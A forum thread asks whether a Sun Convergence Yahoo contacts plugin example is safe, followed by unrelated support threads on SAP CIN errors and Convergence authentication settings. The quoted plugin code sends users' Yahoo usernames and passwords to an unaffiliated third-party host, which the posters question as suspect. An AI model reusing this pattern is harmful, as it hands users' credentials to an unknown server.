YahooABSPlugin customization for Convergence

Hi,
I enabled and tested the YahooABSPlugin customization for Convergence. It works. I would like to know more about this URL, like how safe is it, who controls it and the relationship to Sun since Sun has included and published it in this working example of customizing Convergence. I submitted my working user id and password, which worked and returned my Yahoo contacts. Is this URL safe to use? Or should I change my Yahoo password? Thanks.
c11n.allDomain.js.widget.YahooABSPlugin
signIn: function(e) {
dojo.stopEvent(e);
var getArgs = {
url: "http://www.*{color:#ff0000}funnynstupid.com{color}*/yahoo/importjson.php",
preventCache: true,
content: {txtEmailAddress: this.username.value, txtPassword: this.password.value, ImportContacts: 'yes'}
var deferred = dojo.io.script.get(getArgs);
//jsonImport([{ContactsName: 'AA', ContactsEmail: '[email protected]'}, {ContactsName: 'BB', ContactsEmail: '[email protected]'}]);
return false;

Referencing the Sun comments in the customize.js file you posted: It is my opinion that by including this example in their product documentation, Sun fosters an implicit expectation that it’s OK to use the example.
In the example comments, Sun should include an explicit and “formatted in bold” disclaimer. The disclaimer should, at least, state Sun’s non-affiliation and a warning--"use this example at your own peril".
The oversight to counter and dispel any such legally risky implicit expectation may lead to execution of the example and even incorporation into code, possibly resulting in great harm. Only after researching the URL will one discover the URL and URL owner are suspect--nothing can be found via Google or Whois, regarding the legitimate use of this URL as a public and secure Yahoo proxy for Yahoo contacts access. The questions are: “who within Sun decided this is a cool site and will make a good example…what do/did they know about the site…how did they find it…is it a Sun developer’s personal or on the side web site service?” I would love to know more about it and how Sun came up with it.
Without answers, this leaves one to ponder “why did Sun use a suspect site URL, surely they wouldn’t reference a bad site…would they? There must be 1000’s of examples, with safe URLs, to demonstrate the target functionality; why would they facilitate such a potential compromise?” I trust Sun and I normally don’t think twice about following their direction and instructions. In a world full of deceit, leaders must take extra precaution to protect their followers.
If this site does in fact perform any illegal activities with a user's Yahoo account and contact information as well as much more, since full access is being provided, then Sun will no doubt be party to a lawsuit and negative news. Removal of the example, a legal statement, or replacing the example with an example that utilizes the Yahoo published API, would go a long way towards resolving any potential problems, real or not, relating to this example.

Similar Messages

  • How many emails can I have on my account? Can I have client folders to customize for each client?

    How many emails can I have on my account?
    Can I have client folders for each client to access their own survey/forms?
    Can I customize for each client?
    Do we need multiple subcription accounts for this?

    You need to have one FormsCentral subscription per email.
    At this time FormsCentral doesn't support folders.
    Gen

  • No Customization for Customer 2002missing in table CIN customer master

    HI,
    When Iam saving the excise invoice the error is  coming like..
    "No Customization for Customer 1004 missing in table CIN customer master".
    How i can do?
    regards,
    vas.v.s

    Hi Vas,
               Please check the Customer master record in Sales Area data at Billing Documents Tab ,Tax liable or not liable.
             and also check the Taxes in IMG --> Sales and distribution --> Basic Functions --> Taxes.
    Regards,
    Murali.

  • Customization for register id 000 missing in table Registrations

    Hi all,
    when iam creating (factory sales)excise invoice in j1iin from billing document the error comes as:
    Customization for register id 000 missing in table Registrations
    Message no. 8I303
    Diagnosis
    The customization details have not been maintained for this company
    Procedure
    Please use the localization IMG or Global settings
    to maintain the company settings
    Please help me out.....
    Thanks
    Parin

    Hi Parin,
    Please follow the menu path as below and maintain the settings for the plant of your company code:
    SPRO, Logistics - General, Tax on Goods Movements, India, Basic Settings, Maintain Excise Groups
    Hope this solves your problem.
    Regards,
    Sreekanth....

  • How to unconfigure a Custom Authentication Module for Convergence

    After flailing with the incomplete instructions for [Writing a Custom Authentication Module for Convergence|http://wikis.sun.com/display/CommSuite/Writing+a+Custom+Authentication+Module+for+Convergence]
    , I decided to try to revert back to the default.
    How do you remove the module and go back to the default? I tried to unset the options, but they did not seem to take effect.
    sudo /opt/sun/comms/iwc/sbin/iwcadmin -w xxxxx -o auth.custom.servicename -v ""
    sudo /opt/sun/comms/iwc/sbin/iwcadmin -w xxxxx -o auth.custom.callbackhandler -v ""
    sudo /opt/sun/comms/iwc/sbin/iwcadmin -w xxxxx -o auth.custom.loginimpl -v ""
    sudo /opt/SUNWappserver/bin/asadmin stop-appserv
    sudo /opt/SUNWappserver/bin/asadmin start-appserv
    AUTH: DEBUG from com.sun.comms.client.web.sso.SSOFilter  Thread httpSSLWorkerThread-80-1 at 14:45:25,951 - SSO is disabled
    AUTH: WARN from com.sun.comms.client.protocol.delegate.agent.LoginContextAgent  Thread httpSSLWorkerThread-80-1 at 14:45:25,953 - Subject not found in session, creating one
    AUTH: ERROR from com.sun.comms.client.protocol.delegate.agent.LoginContextAgent  Thread httpSSLWorkerThread-80-1 at 14:45:25,954 - Unabled to load the class due to 
    AUTH: ERROR from com.sun.comms.client.protocol.delegate.agent.LoginContextAgent  Thread httpSSLWorkerThread-80-1 at 14:45:25,956 - Unable to instantiate callback handler 
    AUTH: ERROR from com.sun.comms.client.protocol.delegate.LoginCommandDelegate  Thread httpSSLWorkerThread-80-1 at 14:45:25,957 - Failed to Login the user: Unable to instantiate callback handler 
    PROTOCOL: ERROR from com.sun.comms.client.protocol.delegate.LoginCommandDelegate  Thread httpSSLWorkerThread-80-1 at 14:45:25,960 - Protocol Error while login : Unknown Reason

    jessethompson wrote:
    After flailing with the incomplete instructions for [Writing a Custom Authentication Module for Convergence|http://wikis.sun.com/display/CommSuite/Writing+a+Custom+Authentication+Module+for+Convergence]
    , I decided to try to revert back to the default.
    How do you remove the module and go back to the default? I tried to unset the options, but they did not seem to take effect.After enabling the custom login module using the steps in the earlier thread (http://forums.sun.com/thread.jspa?threadID=5318615), I performed the following steps to disable the custom module and re-enable the ldap auth module:
    # Disable custom auth-module
    cd /opt/sun/comms/iwc/sbin
    ./iwcadmin -w <admin password> -o auth.custom.servicename -v ""
    ./iwcadmin -w <admin password> -o auth.custom.loginimpl -v ""
    ./iwcadmin -w <admin password> -o auth.custom.callbackhandler -v ""
    ./iwcadmin -w <admin password> -o auth.misc.CredentialFile -v ""# Re-enable the LDAP auth-module
    cd /opt/sun/comms/iwc/sbin
    ./iwcadmin -w <admin password> -o auth.ldap.callbackhandler  -v com.sun.comms.client.security.auth.AppCallbackHandler
    ./iwcadmin -w <admin password> -o auth.ldap.loginimpl -v com.sun.comms.client.security.auth.modules.impl.SunLDAPLoginModule# Restarte App Server
    cd /opt/SUNWappserver/bin/
    ./asadmin stop-domain; ./asadmin start-domain# Login to iwc interface as user shjorth with password oldpwd
    # Login successful with oldpwd -- custom auth module successfully disabled, LDAP re-enabled
    Regards,
    Shane.

  • Customization for URL link

    Hi all,
    I facing some problem about the customization for the URL link. I would like to change the logo of sun to my personal logo.Can anyone show me the way to do that ?
    Please advise, your advises are appreciated
    Thanks

    I am not sure if I understood your question correctly. Do you want to change the sun logo in the welcome page of web server instance?. If yes, then go to the <install_webserver_dir>/https-<config-name>/docs and edit the index.html.

  • T61: Keyboard Customizer for Windows 7

    Hello Everyone,
    today I upgraded from Windows XP(32bit) to Windows 7 (64bit). After setting up the operating system I used Lenovo System Update to install all necessary drivers etc. But finally I recognized, that there is no "Keyboard Customizer for Windows 7" on the Lenovo website  . In the office I'm using my laptop in an advanced minidock and have an external keyboard (Lenovo Enhanced USB keyboard) for input.
    Using the Keyboard Customizer it was possible to emulate the missing Fn-Button on the external keyboard  for example using Strg+Alt+Fx. This way it was possible to use all the combinations of Fn+F2 to Fn+F12 with an external keyboard.
    What can I do to get this functionality  on Windows 7 systems?
    There is not installer in the download section for T61 (only Windows XP and Windows Vista). Does anyone know if Lenovo will provide one later on or if the Version for Windows Vista can be used?
    Kind Regards
    KingTutt
    PS: There is also no Presentation Director for Windows 7.
    Solved!
    Go to Solution.

    Hello,
    Have you tried running the ThinkVantage System Update program to update any Windows Vista-era ThinkVantage software on your T61 to their applicable Windows 7 counterparts? 
    Regards,
    Aryeh Goretsky
    I am a volunteer and neither a Lenovo nor a Microsoft employee. • Dexter is a good dog • Dexter je dobrý pes
    S230u (3347-4HU) • X220 (4286-CTO) • W510 (4318-CTO) • W530 (2441-4R3) • X100e (3508-CTO) • X120e (0596-CTO) • T61p (6459-CTO) • T43p (2678-H7U) • T42 (2378-R4U) • T23 (2648-LU7)
      Deutsche Community   Comunidad en Español Русскоязычное Сообщество

  • PLZ Customization for Customer 300000 missing in table CIN customer master

    PLZ ARGNT
    Customization for Customer 300000 missing in table CIN customer master
    Message no. 8I303
    Diagnosis
    The customization details have not been maintained for this company
    Procedure
    Please use the localization IMG or Global settings
    to maintain the company settings

    Dear Murli
    There is no customization for Customer Master, just J1ID Customer Master CIN
    details is maintained
    Regards
    Jitesh

  • Customization for IStore and iSupport

    As these iStore and iSupport belong CRM Family and based on JTT Fwk.
    I have idea about customization for iStore. (Using iStore admin Resp).
    Is Customization would be same as IStore for ISupport Product.

    iSupport and iStore shares many common modules like Registration, Profile pages, User Management. So it will help if you know one product to customize other. Also the JTT framework is same. So the skills required are similar

  • Customization for S100 j_1iindcus missing in table

    Dear All,
    When iam posting a transcation in FB60,iam getting an error and is as follows
    Customization for S100 j_1iindcus missing in table
    Message no. 8I303
    Diagnosis
    The customization details have not been maintained for this company
    Procedure
    Please use the localization IMG or Global settings
    to maintain the company settings
    Manu

    Hi,
    Go to SM30. Enter the Table Name j_1iindcus and click on Maintain. Please enter the setting for the company code S100.
    Enter Document Type, First Month and all necessary required parameters as per your requirement.
    Alternative way to go for customization is
    IMG > Logistics - General > Tax on Goods Movements > India > Basic Settings > Maintain Company Code Settings
    Regards,
    Jigar

  • What is customization for Campaign,Marketing,Marketing plan element?

    Hi,
    I would like to know what is the customization for Campaign, Marketing, Marketing plan element and Campaign element? Please help me out?
    Thanks,
    Satish
    Moderation: Locked. Please, try to find an answer first. See rules of engagement.
    Edited by: Joaquin Fornas on Jan 23, 2012 9:53 AM

    Hi Satish,
    The customizing related to the Marketing Plan, Campaign and Campaign Elements can be found under SPRO->CRM->Marketing.
    Most of the steps need to be performed here.
    Best Regards,
    Padma

  • Customization for 5000 j_1iindcus missing in table

    hi experts,
      Iam getting the following error when doing invoicing. The error is as follows:
    Customization for 5000 j_1iindcus missing in table ( 5000 is company code here)
    Message no. 8I303
    Thnks in advance
    waseem

    Hi,
    The error is comming from program FV64A352.
    It has following code:
        SELECT SINGLE * FROM j_1iindcus WHERE j_1ibukrs = komk-bukrs.
        IF sy-subrc NE 0.
          MESSAGE e303(8i) WITH komk-bukrs 'j_1iindcus' ' '.
        ENDIF.
      ENDIF.
    Kindly put a break point and check what exactly is going wrong.
    Regards,
    Pranaya

  • Set and retain default font setting for Convergence

    Is there an nwsmextendeduserpref for setting the default font for Convergence when composing a mail?
    I tried meFontFace=Tahoma,Verdana,sans-serif but that didn't work
    Anyone know the answer?

    eolair wrote:
    Is there an nwsmextendeduserpref for setting the default font for Convergence when composing a mail?No. There is an existing Request-For-Enhancement to have this functionality added in a future version:
    RFE#6759946 - "End users should be able to set their own default font and fontsize in compose"
    You will need to raise this RFE with your Sun Account Manager.
    Regards,
    Shane.

  • Customization for Discount Account-F110

    Dear Experts,
    I have done Customization for APP for Vendors(F110) and all is fine but i wanted to know what is the customization I need to do configure Discount account and if the payment term has a discount the Discount account should be posted.
    Can someone please explain the process with T-Codes in detail.
    Regards
    Rahul

    Hi
    1.Create the Payment terms in OBB8.
    2.create the G/L Account --- Cash Discount received or Taken in FS00.
    3.Define accounts for cash discounts taken --- OBXU
    Here you will give Chart of Accounts and enter and save.
    Give the G/L Account and save the data.
    In APP --- F110 , discount amounts will be automatically posted to that G/L Account.
    Regards
    Venkat

  • Cisco ASA 5520 SSL VPN Web Login Customization For RSA Login

    I have a Cisco 5520 that I have RSA radius with hardware token up and working witrhout issue. The RSA radius authentication works fine.
    My problem is that I want the login page of the WebVPN portal to display two fields for the user RSA passcode. An RSA passcode is the PIN and the current toke code together.
    I want one field to accept the PIN from the passcode and the other field to accept the TOKEN CODE from the RSA token.
    Currently the login page has in this order:
    USERNAME:
    PASSCODE:
    My end state would be:
    USERNAME:
    PIN:
    TOKENCODE:
    I know this has been done with the native Cisco IPSEC client but I cannot find a way to do this with the WebVPN login page. I have been thru the Customization page and can't seem to get this to work correctly.
    Thanks.

    Hello friend!
    Please allow me to resurect this old post. Did you have the solution?
    Regards!

Maybe you are looking for

  • I am getting an error message stating it cannot find the apps on my ipad.

    I am getting an error message saying "iTunes cannot sync apps to iPad (name) because the apps installed on the iPad cound not be determined." I have logged out of iTunes on both iPad and in iTunes.  Rebooted both iPad and computer then logged back in

  • Crashes upon launching games...

    When I try launch most games on my macbook pro (early 2011) it either sits in the dock or just crashes instantly after displaying. Ive tried completelly uninstalling and reinstalling, repairing disk permissions and even completelly reinstalling the O

  • Host name and ip address

    Hi, i create a audit table , which save every action of the user on the client machines.,,, i run this command on the SQLPLUSW Prompt, and it works well and return host name and ip adress ,, select SYS_CONTEXT('USERENV','HOST') host, SYS_CONTEXT('USE

  • Cannot access/open attachements in calendar on iPhone.

    Hello, At work we are having Outlook and MS Exchange Server 2003. I regularly get meeting invitations with PDF attachmenst that I can open in Outlook on my work PC. On my iPhone 4S (iOS 5.1.1)  calendar I can see the meeting entry but I cannot access

  • Encore won't start after a month of working almost without problems

    Upon startup I get this error message -"The program can't start because MSVCR71.dll is missing from your computer.  Try reinstalling the program to fix this problem."  DO I ACTUALLY HAVE TO REINSTALL CS5 IN ORDER TO USE ENCORE?